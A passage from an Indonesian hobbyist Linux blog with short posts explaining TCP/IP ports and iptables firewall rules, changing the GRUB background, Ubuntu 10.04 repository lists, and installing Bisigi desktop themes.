untuk Info lebih lengkap nya bisa kunjungin
Website Resmi Fbcmd

oke,sekian dari ane :D

Share:

Jumat, 05 Juli 2013

Port for Dummies


Perkenalan Port
Dalam protokol jaringan TCP/IP, sebuah port adalah mekanisme yang mengizinkan sebuah komputer untuk mendukung beberapa sesi koneksi dengan komputer lainnya dan program di dalam jaringan.

Port dapat mengidentifikasikan aplikasi dan layanan yang menggunakan koneksi di dalam jaringan TCP/IP. Sehingga, port juga mengidentifikasikan sebuah proses tertentu di mana sebuah server dapat memberikan sebuah layanan kepada klien atau bagaimana sebuah klien dapat mengakses sebuah layanan yang ada dalam server.

Port dapat dikenali dengan angka 16-Bit (dua byte) yang disebut dengan Port Number dan diklasifikasikan dengan jenis protokol transport apa yang digunakan, ke dalam Port TCP dan Port UDP. Karena memiliki angka 16-bit, maka total maksimum jumlah port untuk setiap protokol transport yang digunakan adalah 65536 buah.

Dilihat dari penomorannya, port UDP dan TCP dibagi menjadi 3 jenis, yakni sebagai berikut:

Well-known Port :
pada awalnya berkisar antara 0 hingga 255 tapi kemudian diperlebar untuk mendukung antara 0 hingga 1023. Port number yang termasuk ke dalam
well-known port, selalu merepresentasikan layanan jaringan yang sama, dan ditetapkan oleh Internet Assigned Number Authority (IANA). Beberapa di antara port-port
yang berada di dalam range Well-known port masih belum ditetapkan dan direservasikan untuk digunakan oleh layanan yang bakal ada di masa depan. Well-known port didefinisikan dalam RFC 1060.

Registered Port : 
Merupakan Port-port yang digunakan oleh vendor-vendor komputer atau jaringan yang berbeda untuk mendukung aplikasi dan sistem operasi yang mereka buat. Registered port juga diketahui dan didaftarkan oleh IANA tapi tidak dialokasikan secara permanen, sehingga vendor lainnya dapat menggunakan port number yang sama. Range registered port berkisar dari 1024 hingga 49151 dan beberapa port di antaranya adalah Dynamically Assigned Port.

Dynamically Assigned Port :
merupakan port-port yang ditetapkan oleh sistem operasi atau aplikasi yang digunakan untuk melayani request dari pengguna sesuai dengan kebutuhan. Dynamically Assigned Port berkisar dari 1024 hingga 65536 dan dapat digunakan atau dilepaskan sesuai kebutuhan.


Berikut Ini Adalah Beberapa Contoh Dari Well-known Port Yang Sering kali Kita Gunakan, Beserta Dengan Fungsi Port-Port tersebut :

Berikut Ini pengertian nama-nama kegunaan port tersebut

- FTP (singkatan dari File Transfer Protocol)
adalah sebuah protokol Internetyang berjalan di dalam lapisan aplikasi yang merupakan standar untuk pentransferan berkas (file) computer antar mesin-mesin dalam sebuah internetwork

- SMTP (Simple Mail Transfer Protocol) 
merupakan salah satu protokol yang umum digunakan untuk pengiriman surat elektronik di Internet. Protokol ini dipergunakan untuk mengirimkan data dari komputer pengirim surat elektronik ke server surat elektronik penerima.

- HTTP (Hypertext Transfer Protocol)
lebih sering terlihat sebagai http) adalah protocol yang dipergunakan untuk mentransfer dokumen dalam World Wide Web (WWW). Protokol ini adalah protokol ringan, tidak berstatus dan generik yang dapat dipergunakan berbagai macam tipe dokumen.

- POP3 (Post Office Protocol version 3)
adalah protokol yang digunakan untuk mengambil surat elektronik (email) dari server email.

- IMAP (Internet Message Access Protocol)
adalah protokol standar untuk mengakses/mengambil e-mail dari server. IMAP memungkinkan pengguna memilih pesan e-mail yang akan ia ambil, membuat folder di server, mencari pesan e-mail tertentu, bahkan menghapus pesan e-mail yang ada.


Sumber : Wikipedia.org

Share:

Rabu, 03 Juli 2013

Apa itu IPTABLES




Apa IP Tables ?

nah,ini  pertanyaan bagus sekali untuk seorang newbie seperti saya,,
cekidot kita belajar mengenai iptables

Iptables adalah suatu tools dalam sistem operasi Linux yang berfungsi sebagai alat untuk melakukan filter (penyaringan) terhadap (trafic) lalulintas data.
Secara sederhana digambarkan sebagai pengatur lalulintas data. Dengan iptables inilah kita akan mengatur semua lalulintas dalam server kita, baik yang masuk ke server, keluar dari server, ataupun traffic yang sekedar melewati server kita.
    *Intinya adalah sebuah filtering pada lalulintas network.
IP Tables melakukan Pemfilteran berdasar IP  -  Port   atau  MAC Adresss..
dalam melakukan Pemfilteran maka IP Tables juga mempunyai sebuah Aturan / privasi policy..


Berikut adalah Tiga Rules pada IP Tables :

- INPUT
Mengatur paket data yang memasuki firewall dari arah intranet maupun internet. kita bisa mengelola komputer/client mana saja yang bisa mengakses firewall.
misal: hanya komputer IP 192.168.1.xx  yang bisa SSH ke firewall dan yang lain tidak boleh.
       *Paket Data yang masuk

- OUTPUT
Mengatur paket data yang keluar dari firewall ke arah intranet maupun internet.
Biasanya output tidak diset,karena bisa membatasi kemampuan firewall itu sendiri.
       *Paket Data Keluar

- FORWARD
Mengatur paket data yang melintasi firewall dari arah internet ke intranet maupun sebaliknya.
Rules forward paling banyak dipakai saat ini untuk mengatur koneksi internet berdasarkan port, mac address dan alamat IP.


selain itu IP Tables juga mempunyai " TARGET "..
TARGET adalah status yang menentukkan koneksi di iptables diizinkan lewat atau tidak..

Tiga macam TARGET yaitu :

- ACCEPT
Diterimanya / di izinkanya sebuah koneksi untuk melwati firewall.

- REJECT
menolak akses, koneksi dari komputer client yang melewati firewall langsung terputus, biasanya terdapat pesan “Connection Refused”.
Target Reject tidak menghabiskan bandwidth internet karena akses langsung ditolak..

- DROP
Akses diterima tetapi paket data langsung dibuang oleh kernel, sehingga pengguna tidak mengetahui kalau koneksinya dibatasi oleh firewall, pengguna melihat seakan – akan server yang dihubungi mengalami permasalahan teknis.
Pada koneksi internet yang sibuk dengan trafik tinggi Target Drop sebaiknya jangan digunakan.



Contoh Penggunaan IP Tables :

- memblok paket dari sebuah IP
   # iptables -I INPUT -s 192.168.0.149 -j REJECT
           *memblok semua koneksi dari IP 192.168.0.149

- membatasi akses port tertentu
   # iptables -A INPUT -i eth1 -s 192.168.1.200 -d 192.168.1.1 -p tcp -dport 22-j REJECT
             *memblok IP 192.168.1.200 mengakses port 22 (ssh) firewall yang memiliki IP 192.168.1.1

- membatasi koneksi berdasar range IP
    # iptables -A FORWARD -m iprange -src-range 192.168.1.100-192.168.1.150 -d 0/0 -j REJECT
              *-d 0/0 berarti ke semua tujuan

- Membatasi koneksi internet berdasarkan MAC Address
     # iptables -A FORWARD -m mac -mac-source 00:30:18:AC:14:41 -d 0/0 -j REJECT


  oke,untuk sekarang sekian dulu :D
next Basic Comand pada iptables

Clound Carbelius

Share:

Kamis, 20 Desember 2012

Ganti Background GNU Grub


Liburan kaya gini bete banget gak ada kerjaan :(

ok,langsung aja dah dari pada ngagur :v

pertama kita mesti siapain,
Background nya, ( .png .tga )

atau Download di Sini


sesudah download itu gambar,pindahkan ke folder
/usr/share/images/desktop-base 

Ketik Perintah berikut di terminal :
gedit /etc/grub.d/05_debian_theme

ada bagus nya,di backup dulu sebelum nya :D

nah keluar tuh gambar seperti ini
                                              image before it is replaced



Perhatikan Gambar di atas

WALLPAPER="/usr/share/images/desktop-base/moreblue-orbit-grub.png"
COLOR_NORMAL="black/black"
COLOR_HIGHLIGHT="magenta/black"


nah,ganti dah jadi kaya di bawah ini :

WALLPAPER="/usr/share/images/desktop-base/File-anda.png"
COLOR_NORMAL="white/black"
COLOR_HIGHLIGHT="yellow/black"


nah kalo sudah di ganti,Klik Save

ketik perintah berikut di terminal.
sudo update-grub

dan Reboot Komputer Anda :D


ok Sekian dari saya Clound
Selamat Tahun Baru 2013...

Share:

Repository Ubuntu


Repository Ubuntu for Ubuntu 10.04 LTS

halo semua,
sekarang udah bulan Desemeber waktu nya libuaran ^ ^
*kok ane jadi curhat ?

ok lah,lanjut ke topik
kali ini saya mau share Server Repo yg paling ane suka.
server nya Ubuntu.


  • deb-src http://archive.ubuntu.com/ubuntu lucid main restricted  
  • deb http://id.archive.ubuntu.com/ubuntu/ lucid main restricted  
  • deb-src http://id.archive.ubuntu.com/ubuntu/ lucid restricted main multiverse universe  
  •   
  • deb http://id.archive.ubuntu.com/ubuntu/ lucid-updates main restricted  
  • deb-src http://id.archive.ubuntu.com/ubuntu/ lucid-updates restricted main multiverse universe  
  •   
  • deb http://id.archive.ubuntu.com/ubuntu/ lucid universe  
  • deb http://id.archive.ubuntu.com/ubuntu/ lucid-updates universe  
  •   
  • deb http://id.archive.ubuntu.com/ubuntu/ lucid multiverse  
  • deb http://id.archive.ubuntu.com/ubuntu/ lucid-updates multiverse  
  •   
  • deb http://id.archive.ubuntu.com/ubuntu/ lucid-backports main restricted universe multiverse  
  • deb-src http://id.archive.ubuntu.com/ubuntu/ lucid-backports main restricted universe multiverse  
  •   
  • deb http://archive.canonical.com/ubuntu lucid partner  
  • deb-src http://archive.canonical.com/ubuntu lucid partner  
  •   
  • deb http://security.ubuntu.com/ubuntu lucid-security main restricted  
  • deb-src http://security.ubuntu.com/ubuntu lucid-security restricted main multiverse universe  
  •   
  • deb http://security.ubuntu.com/ubuntu lucid-security universe  
  • deb http://security.ubuntu.com/ubuntu lucid-security multiverse  
  • deb http://id.archive.ubuntu.com/ubuntu/ lucid-proposed restricted main multiverse universe  



mungkin di antara kalian ada yg Repo nya error ?


fix repo error dengan ini,

gedit /etc/apt/sources.list

tuh source list nya bisa anda Replace / tambahkan di bawah nya.
dengan Server Repo yang ane kasih di atas ^ ^

nah kalo sudah ,Upadate dah tuh List Repo nya

sudo apt-get update

mungkin di repo itu juga ada Backtrack Tool nya ?
entah lah saya belum coba :D


ok,cukup sekian dari ane. Dan Selamat Tahun baru 2013
sampe ketemu lagi.

Share:

Senin, 10 Desember 2012

Best Themes for Ubuntu 10.04 ( Lucid )


Ubuntu 10.04,ini juga di pake sama Backtrack R3
ane lagi bosen sama penampilan Backtrack,kaya nya kurang menarik aja :D

klo ente lagi galau juga,
ini ada themes lumayan mantap bawat ubuntu 10.04 ente

Pertama instal ini dlu. Bisigi-Themes

sudo add-apt-repository ppa:bisigi
sudo apt-get update
sudo apt-get install bisigi-themes


Jika Anda ingin menginstal tema secara terpisah,
bisa menggunakan perintah berikut :


-AquaDreams: 
 sudo apt-get install aquadreams-theme
-Ubuntu Sunrise: 
 sudo apt-get install  ubuntu-sunrise-theme
-Bamboo-Zen:
 sudo apt-get install bamboo-zen-theme
-Step into Freedom: 
 sudo apt-get install step-into-freedom-theme
-Tropical:  
 sudo apt-get install tropical-theme
-Exotic:   
 sudo apt-get install exotic-theme
-Balanzan:        
 sudo apt-get install balanzan-theme
-Wild Shine:    
 sudo apt-get install wild-shine-theme
-Infinit :  
 sudo apt-get install infinity-theme
-Showtime: 
 sudo apt-get install showtime-theme
-Orange:   
 sudo apt-get install orange-theme
-Ellanna:  
 sudo apt-get install ellanna-theme
-AirLines:  
 sudo apt-get install airlines-theme



dan ini contoh penampakan nya :

ShowTime

Balanzan

AirLines

Exotic



Wild Shine





jika anda ingin Me'remove nya dan kembali ke semula (default)
bisa mengukankan Perintah berikut ini :
sudo apt-get remove bisigi-themes


ok,sekian dari ane CLound,
sampe jumpa lagi :D



Share: